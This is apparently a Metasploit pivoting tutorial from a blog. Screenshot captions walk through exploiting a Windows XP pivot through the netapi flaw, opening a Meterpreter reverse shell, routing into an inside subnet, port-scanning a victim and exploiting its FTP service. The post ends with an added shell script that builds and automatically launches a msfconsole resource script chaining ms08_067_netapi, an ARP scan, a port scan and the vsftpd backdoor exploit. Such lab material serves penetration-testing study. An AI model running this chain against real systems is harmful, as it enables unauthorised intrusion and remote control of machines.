METASPLOIT - PIVOTING
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhstFCdksCnUsFqq19zMtxVbWRVqDV6a827sDyvNInsZSn9WWkoTAWDRBFWRWfm-UPO-oLibsXVqjXQnZODy6Oe0AvKRmBS2CgA_io0YOhbGFAVnAtM2I6rP5RLaXGsl2q_DgeC74twQCjm/s1600/screenshot.30.jpg)
- First, let's exploit the XP pivot, taking advantage of the netapi vulnerability:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifm0AxEQEhSdVhENv5gci1xMeeWYEw9m4nWh8tclScLYo9SItECT4mwotp2D-JHyqSzcurPDb-0NvP4B_B_scqAJM7OBF5i-SGD8F1ARBA5T_mVkSHEbViAk5h4qSGibi5OUc6AzGkPelL/s1600/screenshot.4.jpg)
- Setting the remote host to the XP's IP address:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7nb5Hg009S2vvQmhTuDe4rTWBnX3RXXTmYovBxW2RmxAv3oaIAfUUysuYDlrz1oTUG-zhkNTlMNO5u8AeYYHWSnxwqkMT2qIlmhz-U1A2paoM72ArUal4pHm80dz3USuHMFngpNkTKDH-/s1600/screenshot.5.jpg)
- Searching the available payloads for a Meterpreter reverse_tcp shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7G7DC-PY47K_KmJ1J6rPYHAq7SSSuQ-luLQ38O1D_Md8k5RyeP0xE9liEa8CyWiYVJ2S9FGehhBlJCjRu8g1JAXwnwjXIe7tSeQCqJEtoN3hXaAphLHUH_djYYhidtPy8oCnrfZD4C_PX/s1600/screenshot.6.jpg)
- LHOST is the attacker's own address, because a reverse shell connects back from the target to the attacker:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ5k-sZUcOn4R8Wm1U45LqlNkLnGvljmynRCurLiH8nFvHP21YAG6TPQzbu8F5pLbVvd90uZ-nHbOgsM-JVLY6kTooWtkbcM0e6ThB6mYvjKsfmBUqkjN9b3iX2WYzMXH8eDsCrvuTzFYp/s1600/screenshot.7.jpg)
- Once the exploit is launched, the attack succeeds and a Meterpreter session is obtained:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzss1XVmbSIIN_wMdSVWP3Yf_6ojU3N6IGx27WQS-iWy5FZJCoP_iAzCLn5egErwDJyIcA07sHs5o0PvvDdoIHv82Ot_6e4edxRZfmpMGUAQ7bLIvKlcTySRvY3jRr9aAEXry3IULV4VZp/s1600/screenshot.8.jpg)
- The pivot has two interfaces, one on the outside network 192.168.1.0/24 and the other on the inside network 10.0.0.0/24, which the attacker cannot reach directly:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijhvbABFOWcuKvQQpUfIvtUMqcGFt5VTkEgU1nytmBPb2rsp-xtFici4v2_pS6FhlRFhgnJ33RYhSlnBNO8uyx8wrPGYLKuwwHVmIJ9YNe3nUn39yMZPuz_0tLUNJKZhlm9LlM4ggbgZrO/s1600/screenshot.11.jpg)
- Let's discover hosts on the inside network 10.0.0.0/24 from the pivot. Since 10.0.0.1 is the XP pivot's own inside address, 10.0.0.2 must belong to the innermost machine, the victim:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCgCoXnK0i_X_8enjgXinB_NHmpfR4xfzEUtuVbcOwPfd7DrujZNa41ntx-DiVT4DUM3xNIqbgeiv3WRnP70jIF-QGQ2O8LXw_RXXJdY2Hh11dUhjb2QBY-e2fb_0_PQtVnHFRHP9GJVS3/s1600/screenshot.12.jpg)
- Backgrounding the meterpreter session 1:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5bWJ7kt7Kh1egGLbNK___BX5Y0cbPkVe48xAPX1N5JkMtaYKYrmSq2cQyaga93L7KJTlwFxHJfCPpax5UUUs4fSdxlUTAJOqhyZUVYBICJXUyqhIMPzIY_fObG47d8upho426v3QySzWk/s400/screenshot.9.jpg)
- So far there is only one active Meterpreter session, number 1:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJg_RvYCdjJgvdtof8ehA5eP5KmmpXnojRypkIYhYwTM-g5DcdkTwkE8SMGNecmphfnStrK1dXbqio2rCVrtEAh0-aWS_r7J39PahuP4aMeowKnK7zhTAueNre6oOzvG5Elt85a58kE73E/s1600/screenshot.10.jpg)
- A route to the inside network is added through the active Meterpreter session 1, so that framework modules targeting 10.0.0.0/24 are tunneled through the pivot. Note that this route is only honoured by Metasploit's own modules (and it disappears with the session); tools outside the framework would additionally need a SOCKS proxy module on top of it:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5mGWO44OuIPFknsGHrMr0oEEtyW7lAJXEj93A7TxCHw5CLGYmZyWrOF3bB4WRPbWHEIjFUc4tWX8Yjkr-oCYIf0RU0t5ORxCD6kZ0IBuQOdX23ZPTYob89Xn65EPYEsUP1EzECGHKOn4i/s1600/screenshot.14.jpg)
- Printing the route:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnVIGmUoxpkXdWlPsoJzmEHtPfAjWGt73X1ZLHidwdo4Dfnhg1cVwzv-Cj_4GmEj1tQbVe9cyhO7jaEjrfLMh-ymY2zY4ohwKFvpiofQH8werfj20awamWbHXo8V83r-Ljmfp-10jFQB57/s1600/screenshot.15.jpg)
- Leaving the netapi exploit module with back:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ2HarMMzVqMoQjmfnNZkClu8vCTHEZx7dcObGcUzIoKYluox_LJMJ-WL1xgtLGHkY54HX0AwfEjF05AWR0QBinTxpl_RAb5G3LpOyTb1XDZyG9eOk8DSuGStLsMvrwhEoLyth78WthQo7/s1600/screenshot.16.jpg)
- Scanning open ports (just 1 to 500) on the victim 10.0.0.2, through the route just added:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglRpEunqO-jR9hgQOb6Joe9ifk1bo4l02D_X_gGzYVxZgMXp95ggjhzDPbWuqFW_Ju3VeK7REc6zAiFwEkDBhqRAy4WBwMHxwUT46YBu2GruHXlIAyTRmU1h8-wvDC2-UaRuSBw7xK-DsB/s1600/screenshot.17.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJvm96Yke83GpXPYhYpl1bHibHO1fJJ2l_n-wzNPxaC-v2i65F8dtnc3lQqtr-CFyWS1YwAl4OPd0OzB3eWlIZlbKfiakRbKsnAI5SS7r5MuFYZu9K3K4_thUOssL-cWrdOFfRJIBdGjM1/s1600/screenshot.18.jpg)
- Several interesting ports are open, for instance TCP 21, usually used by an FTP service:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPdi5O9VPcFZf4iJq3nNRnAJx3KJ630XSB_JnEiqWU9vdteYEp8Ekr2HVvYuIcCiwz-es7VjVq1AbDRSogPxtXrmP5yxrVNbZmeLNv3TQ4LPGaRy4XSCP9h_BURcYuvpVJHoG8eCroncu7/s1600/screenshot.19.jpg)
- Leaving the auxiliary module with back:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYp7dptxGcF96xsEr5Z8tfDY68CGNLf6yeWz2BDaMhbAyGoFell3FJPI0jj5XWNNa5R5qnTOHy3JCn-osRPMEDLHWM_BYfA2UTckSz4_Zlcy_sEBTNnXI5-hB6wcUS19njaUT3lkl9FyKd/s400/screenshot.20.jpg)
- Now, let's try attacking the FTP service on the victim:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixL25LT-3S0lf96Nkb9Ajoc5TyAb2gDjdSg9pksLabbaVioPTGaiZJMv2Y8Ivy9PTfX0jFBuvGPgIupZxUfuQtguwZZYemgusCmZG6S3-znZLbzmA-Vd4v_XXMEB3nJjqq0p4UFmrGSxQ3/s1600/screenshot.21.jpg)
- Setting the victim's IP as the remote host:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkXPvYWQE2D346cd2TjV0PGhDr-TdW14X7HjiV3ywo4FxcTUU-zVWaV46pvUp9ksHcysyjo9xtT8zGX78K5QO7UrmKGcurnpZ7AvtWyDo7giU0IVi2DNU78ecMvWZzUixv5SfQpPm_SDOH/s1600/screenshot.22.jpg)
- Let's use the payload cmd/unix/interact, which simply interacts with the shell the exploited service hands back, to get a remote shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizB1hCYHC1ub7y1GYUBFtnYFZ0-xlC14Nzur9aPB-JtUrjaIKMTG7Dw_hFw2HGBGYyGfFJ58i9H5i5Ms5-rdUD-1Y2Z-Tc57mcg9vEM93ECVYHKpPVJvgMneiliVfGhPSGm-TDt275TRit/s1600/screenshot.23.jpg)
- Required options:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVwZ-9c6aFaJgO-BoSsgQvuaXUHAU7quOxowyZl6O-AbNnGEsLgVPpB8AGl6G_QneT7BnLTbfyGEBOgIiEGTjGSuG4LqRVpQK_KZVyY5kyjZpOvqWNOwZAr6PhvYkrjJbdYnwuLtNnYVmk/s1600/screenshot.24.jpg)
- Once the exploit is run, the attack succeeds: a remote shell on the victim is obtained, tunneled back to the attacker through the pivot:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikrmSmj4Fhv5I2JhtzX-J2A8uMTneOmRpprbZPa1iLGdf4aSwx38LhJERImXDRAwFj3Eb_uxrFbvOqCcyG2QcsaMoow6-gZfhqtmPb-kJOpJsNuTfEoWWS6qvekma6OGjoH0XsPLfDlDnT/s1600/screenshot.25.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkhKji9k4kRdwXGXrYjXN6Q8mEV5nY-xT8lTHZ-JQbdvMiCBFiX_W7zQ92SeA6P_euflDOZ23P2N1R44TPHRDSZ6_Tas-RDCv4B8QiE4dh5fm4Ei5s-DzN30bquIXYPSd6mTc-NL05UhJQ/s1600/screenshot.27.jpg)
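- The whole chain above (exploit the pivot, discover the inside host, add the route, scan through it, exploit the victim) can be replayed from a single msfconsole resource script. The shell script below is an added example, not the commands from the original post: it generates such a resource script and runs it with `msfconsole -r` when the framework is installed. The subnet and victim address (10.0.0.0/24, 10.0.0.2) come from the write-up; the attacker and pivot addresses (192.168.1.10, 192.168.1.20), the netapi module (exploit/windows/smb/ms08_067_netapi), the arp_scanner post module used for host discovery and the FTP exploit module (exploit/unix/ftp/vsftpd_234_backdoor, chosen because its payload is cmd/unix/interact) are assumptions, since the page shows them only in screenshots:

```shell
#!/bin/sh
# Added example (not from the original post): generate a msfconsole resource
# script that replays the pivot described above. Module names and the
# attacker/pivot addresses are assumptions; see the lead-in.

# Emit the resource script on stdout.
#   $1 attacker IP (LHOST)   $2 pivot IP (outside address)
#   $3 inside subnet (CIDR)  $4 victim IP (inside)
#   $5 FTP exploit module (assumed, not named in the page's text)
build_pivot_rc() {
  attacker="$1"; pivot="$2"; inner="$3"; victim="$4"; ftp_module="$5"
  cat <<EOF
# 1. exploit the pivot; -j -z runs it as a job without dropping into the
#    session, so the rest of the script keeps executing
use exploit/windows/smb/ms08_067_netapi
set RHOST $pivot
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $attacker
exploit -j -z
sleep 15
sessions -l
# 2. discover inside hosts from the pivot (assumed: arp_scanner post module)
sessions -i 1 -C "run post/windows/gather/arp_scanner RHOSTS=$inner"
# 3. route the inside subnet through session 1 and verify it
#    (older consoles take the form: route add 10.0.0.0 255.255.255.0 1)
route add $inner 1
route print
# 4. port-scan the victim through the route (ports 1-500 as in the write-up)
use auxiliary/scanner/portscan/tcp
set RHOSTS $victim
set PORTS 1-500
run
# 5. attack FTP on the victim; cmd/unix/interact drives the shell handed back
use $ftp_module
set RHOST $victim
set PAYLOAD cmd/unix/interact
exploit
EOF
}

# Write the script and run it if msfconsole is on PATH; otherwise only write it.
# Addresses 192.168.1.10 (attacker) and 192.168.1.20 (pivot) are assumed.
run_pivot() {
  out="${1:-pivot.rc}"
  build_pivot_rc 192.168.1.10 192.168.1.20 10.0.0.0/24 10.0.0.2 \
    exploit/unix/ftp/vsftpd_234_backdoor > "$out"
  if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$out"
  else
    echo "msfconsole not found; resource script written to $out" >&2
    return 1
  fi
}
```

Source the file and call `run_pivot pivot.rc` to generate and launch it. Two practical points: `route print` must list the inside subnet against session 1 before the scanner is run, otherwise the scanner will try to reach 10.0.0.2 from the attacker's own stack and silently find nothing; and because the route is bound to session 1, if the Meterpreter session dies the route has to be re-added (or cleared with `route flush`) once a new session is obtained.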